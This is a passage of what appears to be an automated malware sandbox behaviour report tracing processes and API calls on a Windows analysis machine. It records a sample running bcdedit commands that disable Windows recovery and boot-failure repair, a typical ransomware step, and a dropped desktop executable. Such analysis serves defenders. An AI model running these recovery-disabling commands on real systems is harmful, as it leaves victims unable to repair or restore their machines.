Thread: id = 156 os_tid = 0x13a8 Thread: id = 205 os_tid = 0x55c Thread: id = 234 os_tid = 0x12f8 Thread: id = 236 os_tid = 0x1244 Thread: id = 237 os_tid = 0x11fc Thread: id = 244 os_tid = 0x12ec Thread: id = 245 os_tid = 0xbc0 Thread: id = 247 os_tid = 0xed8 Thread: id = 248 os_tid = 0xeb0 Thread: id = 249 os_tid = 0xfbc Thread: id = 251 os_tid = 0x7e4 Thread: id = 253 os_tid = 0xd2c Thread: id = 664 os_tid = 0x1134 Thread: id = 665 os_tid = 0x1204 Thread: id = 666 os_tid = 0x13c8 Thread: id = 667 os_tid = 0x1094 Thread: id = 668 os_tid = 0xda8 Thread: id = 669 os_tid = 0x12e0 Thread: id = 695 os_tid = 0x1374 Thread: id = 715 os_tid = 0x6e0 Thread: id = 716 os_tid = 0xea4 Thread: id = 717 os_tid = 0x119c Thread: id = 718 os_tid = 0x139c Thread: id = 719 os_tid = 0xf4 Thread: id = 720 os_tid = 0xf00 Thread: id = 721 os_tid = 0x778 Process: id = "7" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x6fc0c000" os_pid = "0x10c4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 121 os_tid = 0x10f8 Thread: id = 122 os_tid = 0x10f0 Thread: id = 123 os_tid = 0x10ec Thread: id = 124 os_tid = 0x10e8 Thread: id = 125 os_tid = 0x10e4 Thread: id = 126 os_tid = 0x10e0 Thread: id = 127 os_tid = 0x10d8 Thread: id = 128 os_tid = 0x10c8 Process: id = "8" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x3a6d1000" os_pid = "0xe0c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0002e7d2" [0xc000000f] Thread: id = 129 os_tid = 0x10b4 Thread: id = 130 os_tid = 0xe34 Thread: id = 131 os_tid = 0xe30 Thread: id = 132 os_tid = 0xe2c Thread: id = 133 os_tid = 0xe28 Thread: id = 134 os_tid = 0xe24 Thread: id = 135 os_tid = 0xe20 Thread: id = 136 os_tid = 0xe1c Thread: id = 137 os_tid = 0xe10 Thread: id = 146 os_tid = 0x13ec Thread: id = 671 os_tid = 0x11d8 Thread: id = 672 os_tid = 0xe00 Process: id = "9" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x1e8fa000" os_pid = "0x1028" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x11dc" cmd_line = "bcdedit /set {default} recoveryenabled No" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 141 os_tid = 0x11cc Thread: id = 150 os_tid = 0x1184 Process: id = "10" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1f2c7000" os_pid = "0x10a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x1028" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 143 os_tid = 0x1188 Thread: id = 145 os_tid = 0x13e8 Thread: id = 147 os_tid = 0x1070 Thread: id = 148 os_tid = 0x13fc Thread: id = 149 os_tid = 0x1050 Process: id = "11" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0xf9f9000" os_pid = "0x1140" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x11dc" cmd_line = "bcdedit /set {default} bootstatuspolicy IgnoreAllFailures" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 151 os_tid = 0x13cc Thread: id = 160 os_tid = 0x114c Process: id = "12" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x76569000" os_pid = "0x13c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x1140" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 152 os_tid = 0x11d4 Thread: id = 154 os_tid = 0x1204 Thread: id = 157 os_tid = 0x11d0 Thread: id = 158 os_tid = 0x1194 Thread: id = 159 os_tid = 0x1134 Process: id = "13" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x5ae7c000" os_pid = "0x1150" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x11dc" cmd_line = "bcdedit /set {globalsettings} advancedoptions false" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 161 os_tid = 0x115c Thread: id = 167 os_tid = 0x1180 Process: id = "14" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5aab7000" os_pid = "0x1154" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x1150" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 162 os_tid = 0x11d8 Thread: id = 163 os_tid = 0x1170 Thread: id = 164 os_tid = 0x1220 Thread: id = 165 os_tid = 0x520 Thread: id = 166 os_tid = 0x124c Process: id = "15" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x5a891000" os_pid = "0x1158" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x3ac" cmd_line = "C:\\WINDOWS\\system32\\sc.exe start wuauserv" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 170 os_tid = 0x1198 [0205.079] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff770250000 [0205.079] __set_app_type (_Type=0x1) [0205.079] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7702522b0) returned 0x0 [0205.080] __wgetmainargs (in: _Argc=0x7ff770261028, _Argv=0x7ff770261030, _Env=0x7ff770261038, _DoWildCard=0, _StartInfo=0x7ff770261044 | out: _Argc=0x7ff770261028, _Argv=0x7ff770261030, _Env=0x7ff770261038) returned 0 [0205.080] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.084] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.084] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0205.085] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0205.085] _wcsicmp (_String1="start", _String2="query") returned 2 [0205.085] _wcsicmp (_String1="start", _String2="queryex") returned 2 [0205.085] _wcsicmp (_String1="start", _String2="start") returned 0 [0205.085] ResolveDelayLoadedAPI () returned 0x7ffce9434cf0 [0205.088] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x1b1803b85b0 [0205.131] OpenServiceW (hSCManager=0x1b1803b85b0, lpServiceName="wuauserv", dwDesiredAccess=0x14) returned 0x1b1803b6b30 [0205.132] StartServiceW (hService=0x1b1803b6b30, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 0 [0205.148] GetLastError () returned 0x420 [0205.148] _ultow (in: _Dest=0x420, _Radix=2139814136 | out: _Dest=0x420) returned="1056" [0205.148] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x420, dwLanguageId=0x0, lpBuffer=0x7ff770261640, nSize=0x400, Arguments=0x0 | out: lpBuffer="An instance of the service is already running.\r\n") returned 0x30 [0205.150] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x557f8af8b0, nSize=0x2, Arguments=0x557f8af8e0 | out: lpBuffer="梐耻Ʊ") returned 0x54 [0212.553] GetFileType (hFile=0x50) returned 0x2 [0212.553] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x557f8af860 | out: lpMode=0x557f8af860) returned 1 [0212.554] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x1b1803b6890*, nNumberOfCharsToWrite=0x54, lpNumberOfCharsWritten=0x557f8af858, lpReserved=0x0 | out: lpBuffer=0x1b1803b6890*, lpNumberOfCharsWritten=0x557f8af858*=0x54) returned 1 [0212.556] LocalFree (hMem=0x1b1803b6890) returned 0x0 [0212.556] LocalFree (hMem=0x0) returned 0x0 [0212.556] CloseServiceHandle (hSCObject=0x1b1803b6b30) returned 1 [0212.557] CloseServiceHandle (hSCObject=0x1b1803b85b0) returned 1 [0212.558] LocalFree (hMem=0x0) returned 0x0 [0212.558] exit (_Code=1056) Thread: id = 658 os_tid = 0x1070 Thread: id = 673 os_tid = 0x1070 Thread: id = 675 os_tid = 0x1070 Process: id = "16" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x265cc000" os_pid = "0x85c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x3ac" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 177 os_tid = 0x6d8 Thread: id = 182 os_tid = 0x1ec Thread: id = 184 os_tid = 0xe54 Thread: id = 212 os_tid = 0x1398 Thread: id = 214 os_tid = 0x1378 Thread: id = 215 os_tid = 0x12f0 Thread: id = 701 os_tid = 0xdfc Process: id = "17" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5badd000" os_pid = "0x648" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x1158" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 239 os_tid = 0xf0 Thread: id = 243 os_tid = 0xfe8 Thread: id = 246 os_tid = 0x53c Thread: id = 250 os_tid = 0xd74 Thread: id = 254 os_tid = 0x874 Process: id = "18" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x1aa60000" os_pid = "0x1300" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x11dc" cmd_line = "C:\\WINDOWS\\SysWOW64\\WerFault.exe -u -p 4572 -s 1020" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 238 os_tid = 0x12d8 Thread: id = 240 os_tid = 0x1324 Thread: id = 241 os_tid = 0xc20 Thread: id = 242 os_tid = 0xec8 Thread: id = 252 os_tid = 0xd60 Thread: id = 653 os_tid = 0x11cc Thread: id = 656 os_tid = 0x13e8 Thread: id = 657 os_tid = 0x10a0 Thread: id = 660 os_tid = 0x848 Thread: id = 670 os_tid = 0x7b8 Process: id = "19" image_name = "rxodge.exe" filename = "c:\\users\\fd1hvy\\desktop\\rxodge.exe" page_root = "0x1abca000" os_pid = "0x10a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x11dc" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\rxodge.exe\" " cur_dir = "C:\\WINDOWS\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "20" image_name = "System" filename = "" page_root = "0x1aa000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "created_daemon" parent_id = "15" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 255 os_tid = 0x1308 Thread: id = 256 os_tid = 0x80 Thread: id = 257 os_tid = 0xe8 Thread: id = 258 os_tid = 0x1344 Thread: id = 259 os_tid = 0x12bc Thread: id = 260 os_tid = 0x14 Thread: id = 261 os_tid = 0x124 Thread: id = 262 os_tid = 0xeec Thread: id = 263 os_tid = 0x128 Thread: id = 264 os_tid = 0xe58 Thread: id = 265 os_tid = 0x0 Thread: id = 266 os_tid = 0x30 Thread: id = 267 os_tid = 0x188 Thread: id = 268 os_tid = 0x100 Thread: id = 269 os_tid = 0xb18 Thread: id = 270 os_tid = 0xb14 Thread: id = 271 os_tid = 0xa8 Thread: id = 272 os_tid = 0xa64 Thread: id = 273 os_tid = 0xc4 Thread: id = 274 os_tid = 0x84 Thread: id = 275 os_tid = 0x9dc Thread: id = 276 os_tid = 0x974 Thread: id = 277 os_tid = 0x8d0 Thread: id = 278 os_tid = 0x8b0 Thread: id = 279 os_tid = 0x848 Thread: id = 280 os_tid = 0x844 Thread: id = 281 os_tid = 0x82c Thread: id = 282 os_tid = 0x4d8 Thread: id = 283 os_tid = 0x10 Thread: id = 284 os_tid = 0x664 Thread: id = 285 os_tid = 0x644 Thread: id = 286 os_tid = 0x64 Thread: id = 287 os_tid = 0x5e0 Thread: id = 288 os_tid = 0x34 Thread: id = 289 os_tid = 0x4a4 Thread: id = 290 os_tid = 0x49c Thread: id = 291 os_tid = 0x40 Thread: id = 292 os_tid = 0x1b8 Thread: id = 293 os_tid = 0x6c Thread: id = 294 os_tid = 0xb0 Thread: id = 295 os_tid = 0x364 Thread: id = 296 os_tid = 0x2c Thread: id = 297 os_tid = 0x1b4 Thread: id = 298 os_tid = 0x8c Thread: id = 299 os_tid = 0x2f8 Thread: id = 300 os_tid = 0x68 Thread: id = 301 os_tid = 0x174 Thread: id = 302 os_tid = 0xfc Thread: id = 303 os_tid = 0x60 Thread: id = 304 os_tid = 0x164 Thread: id = 305 os_tid = 0x70 Thread: id = 306 os_tid = 0x74 Thread: id = 307 os_tid = 0x1f8 Thread: id = 308 os_tid = 0x13c Thread: id = 309 os_tid = 0x1bc Thread: id = 310 os_tid = 0x1b0 Thread: id = 311 os_tid = 0x1ac Thread: id = 312 os_tid = 0x1a8 Thread: id = 313 os_tid = 0x28 Thread: id = 314 os_tid = 0x130 Thread: id = 315 os_tid = 0xe4 Thread: id = 316 os_tid = 0x20 Thread: id = 317 os_tid = 0x54 Thread: id = 318 os_tid = 0xbc Thread: id = 319 os_tid = 0x180 Thread: id = 320 os_tid = 0xc8 Thread: id = 321 os_tid = 0xa4 Thread: id = 322 os_tid = 0x50 Thread: id = 323 os_tid = 0x11c Thread: id = 324 os_tid = 0x120 Thread: id = 325 os_tid = 0x15c Thread: id = 326 os_tid = 0x14c Thread: id = 327 os_tid = 0xb8 Thread: id = 328 os_tid = 0x148 Thread: id = 329 os_tid = 0x88 Thread: id = 330 os_tid = 0xb4 Thread: id = 331 os_tid = 0xec Thread: id = 332 os_tid = 0x8 Thread: id = 333 os_tid = 0xf0 Thread: id = 651 os_tid = 0x4c Thread: id = 652 os_tid = 0x1c Thread: id = 654 os_tid = 0x18 Process: id = "21" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x56669000" os_pid = "0x23c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "created_daemon" parent_id = "15" os_parent_pid = "0x1dc" cmd_line = "C:\\WINDOWS\\system32\\services.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 334 os_tid = 0x1260 Thread: id = 335 os_tid = 0x1394 Thread: id = 336 os_tid = 0x86c Thread: id = 337 os_tid = 0x854 Thread: id = 338 os_tid = 0x12c Thread: id = 339 os_tid = 0x3ec Thread: id = 340 os_tid = 0x3e8 Thread: id = 341 os_tid = 0x3e4 Thread: id = 342 os_tid = 0x3d4 Thread: id = 343 os_tid = 0x3d0 Thread: id = 344 os_tid = 0x3bc Thread: id = 345 os_tid = 0x328 Thread: id = 346 os_tid = 0x2fc Thread: id = 347 os_tid = 0x298 Thread: id = 348 os_tid = 0x294 Process: id = "22" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75ed0000" os_pid = "0x2a4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" 